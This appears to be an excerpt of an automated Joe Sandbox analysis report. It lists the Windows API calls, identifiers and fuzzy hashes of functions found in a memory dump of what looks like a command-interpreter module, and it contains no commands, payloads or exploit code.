                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorLast$InformationVolumeiswalphatowupper
                              • String ID: %04X-%04X$:
                              • API String ID: 930873262-1938371929
                              APIs
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16A73
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16A91
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16AB0
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16AE3
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16B01
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$iswdigit
                              • String ID: +-~!$<>+-*/%()|^&=,
                              • API String ID: 2770779731-632268628
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                              • String ID:
                              • API String ID: 3192234081-0
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F11673
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F1168D
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F11757
                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F1176E
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F11788
                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F1179C
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Process$Alloc$Size
                              • String ID:
                              • API String ID: 3586862581-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                              • String ID:
                              • API String ID: 1313749407-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                              • String ID:
                              • API String ID: 920682188-0
                              APIs
                              • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1BA
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F1E7
                              • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1FF
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F2BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit$iswspacewcschr
                              • String ID: )$=,;
                              • API String ID: 1959970872-2167043656
                              • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                              • Instruction ID: ea862ab825ff82cdb19ccaddc6d8d5768ed13324faf621cabc5491e4c4ba097c
                              • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                              • Instruction Fuzzy Hash: 4A413665E0C616D6FB64BF13A5D8279B6A0AFA0755FCC9035CE8D021ECCF7CA485A630
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmpfprintfwcsrchr
                              • String ID: CMD Internal Error %s$%s$Null environment
                              • API String ID: 3625580822-2781220306
                              • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                              • Instruction ID: 8db3748b5cf487d76d1862f64ddc651fee1ab6b566f55aa7c79ef14803870df8
                              • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                              • Instruction Fuzzy Hash: AC31AD21B0C646C2FB14BF43A5906BAB2A0FB45B94F885134CE1D17BE9EE3DE445D320
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memsetwcsspn
                              • String ID:
                              • API String ID: 3809306610-0
                              • Opcode ID: 231042d871709e842a58ac96de8cecde88a4784088973e8bd81687bc68b42317
                              • Instruction ID: 69386871fbf303d88bd9f8cec97215f18257d704fb2c90bf860edd4cb7b543c9
                              • Opcode Fuzzy Hash: 231042d871709e842a58ac96de8cecde88a4784088973e8bd81687bc68b42317
                              • Instruction Fuzzy Hash: B1B16E61A0CA86C2EB50BF96E490669E7B0FB54B80FC98031DE4E577D9DE7CE841D720
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$iswdigit$wcstol
                              • String ID:
                              • API String ID: 3841054028-0
                              • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                              • Instruction ID: 0b17c0922977a56cb7b53bb534fd406b76a2ff913f46b56bb16694c268474e90
                              • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                              • Instruction Fuzzy Hash: B551A426A0CA52C2E764BF17D4901B9B6A1FF68B51BCC8331DE5D422D8DF3DE456E220
                              APIs
                              • _get_osfhandle.MSVCRT ref: 00007FF744F23687
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F236A6
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F236EB
                              • _get_osfhandle.MSVCRT ref: 00007FF744F23703
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F23722
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Write_get_osfhandle$Mode
                              • String ID:
                              • API String ID: 1066134489-0
                              • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                              • Instruction ID: 03952be89b5e5851796d700cb64652f9ae7a22874f8080bf0615f3c3faab3b7b
                              • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                              • Instruction Fuzzy Hash: A15191A1B0C642C7EB24BF23948457AEAA5FB45B90F8C4435DE4A077D8DF3DE440AB21
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                              • String ID:
                              • API String ID: 3249344982-0
                              • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                              • Instruction ID: 578939e4242fb67fa47df001270a7bbdf748ec297657d080c39c07082e531b99
                              • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                              • Instruction Fuzzy Hash: FD411D7261CA42C7F310AF12A884769BAA4FB59B95F884235DE8907BD8CF3CD5549B10
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$DriveErrorInformationLastTypeVolume
                              • String ID:
                              • API String ID: 850181435-0
                              • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                              • Instruction ID: a25159a1a3ac335a3f46242e936a41f15642525bb5f6a23aebf290d83171d45b
                              • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                              • Instruction Fuzzy Hash: E1415E3261CBC1CAE760AF22D8842E9B7A4FB89B44FC94525DE4D4BB98CF38D545D710
                              APIs
                                • Part of subcall function 00007FF744F13578: _get_osfhandle.MSVCRT ref: 00007FF744F13584
                                • Part of subcall function 00007FF744F13578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                                • Part of subcall function 00007FF744F13578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                                • Part of subcall function 00007FF744F13578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                                • Part of subcall function 00007FF744F13578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                                • Part of subcall function 00007FF744F13578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F13514
                              • _get_osfhandle.MSVCRT ref: 00007FF744F13522
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F13541
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F1355E
                                • Part of subcall function 00007FF744F136EC: _get_osfhandle.MSVCRT ref: 00007FF744F13715
                                • Part of subcall function 00007FF744F136EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF744F13770
                                • Part of subcall function 00007FF744F136EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F13791
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                              • String ID:
                              • API String ID: 4057327938-0
                              • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                              • Instruction ID: 8ff8c57ca9dc096927748f16e9390c916036249e62a65df1ad22399b41290981
                              • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                              • Instruction Fuzzy Hash: 9A313C21A0CA42C7F754BF67A481079EAB4EF89B51FCC4135DE4E827D9DE3CE805A620
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                              • String ID: KEYS$LIST$OFF
                              • API String ID: 411561164-4129271751
                              • Opcode ID: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                              • Instruction ID: 234286788b9ec5b3d94f46992f5df923af23bde49a8f9ae562fe3542a5575cac
                              • Opcode Fuzzy Hash: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                              • Instruction Fuzzy Hash: 89214D20A1CA02C2FB54BF27A4C5175A6A1FB84750FC99631CE1E462EDDE7DE544A620
                              APIs
                              • _get_osfhandle.MSVCRT ref: 00007FF744F101C4
                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F101D6
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F10212
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F10228
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F1023C
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F10251
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                              • String ID:
                              • API String ID: 513048808-0
                              • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                              • Instruction ID: 1dca9756e8f8f9b455c54d60a1b5b15015b9caac53f0f8f28fa142f89f77c4b2
                              • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                              • Instruction Fuzzy Hash: 2D21513190C682CBE7507F66A5C4238FAA0FF5A755F9C5134DE0E46AD8CE7CA848A720
                              APIs
                              • _get_osfhandle.MSVCRT ref: 00007FF744F13584
                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                              • String ID:
                              • API String ID: 513048808-0
                              • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                              • Instruction ID: 140e26a0a81a26be845006019222410ba0b7a0bba6d3e7769f1cf0147624425b
                              • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                              • Instruction Fuzzy Hash: 13114F31A0CA42C7EB50BF26A5C4478EAA0FB49B65F995334DD6F427D8CE3CD845A610
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 4104442557-0
                              • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                              • Instruction ID: c0aac1a5d9c9774d1e9bb96ac3a74788abd524ddc1d268ca31471514ad1a90e4
                              • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                              • Instruction Fuzzy Hash: 54114226A09B41CBEF00FF62E88416873A4F719758F840A34EE6D47B98DF3CD5648350
                              APIs
                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F271F9
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F2720D
                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F27300
                                • Part of subcall function 00007FF744F25740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF744F275C4,?,?,00000000,00007FF744F26999,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F25744
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: OpenSemaphore$CloseErrorHandleLast
                              • String ID: _p0$wil
                              • API String ID: 455305043-1814513734
                              • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                              • Instruction ID: 614ba4b4d610974da8b7c18f55219536cf8e185883ac7472873659df69b94f40
                              • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                              • Instruction Fuzzy Hash: 22617F62B1DA42C6EF25BF5694901B9A3E1FF84B80F985431DE0E077D8DE3EE9049720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapiswspacememset$AllocProcess
                              • String ID: %s
                              • API String ID: 2401724867-3043279178
